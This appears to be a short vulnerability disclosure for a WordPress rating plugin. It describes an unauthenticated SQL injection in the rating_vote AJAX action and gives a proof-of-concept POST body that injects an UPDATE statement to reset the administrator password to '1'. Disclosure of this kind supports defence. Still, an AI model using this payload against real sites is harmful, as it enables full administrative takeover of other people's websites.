One can perform an SQL injection attack simply by exploiting
wp_ajax_nopriv_rating_vote action. POST parameters data_target and data_vote can be used to execute arbitrary SQL commands in the database.
Proof of Concept
In the following PoC we change the administrators password to ‘1’ so a malicious user can then login as the administrator, taking full control of the website.
- Send a post request to
action=rating_vote&data_id=1&data_target=user_id IN (1); UPDATE wp_users set user_pass=MD5(1) where ID &data_vote=1
- Login with administrator’s user name and password
Note that we assume that table name prefix is
wp and administrators user id is 1, a very common scenario.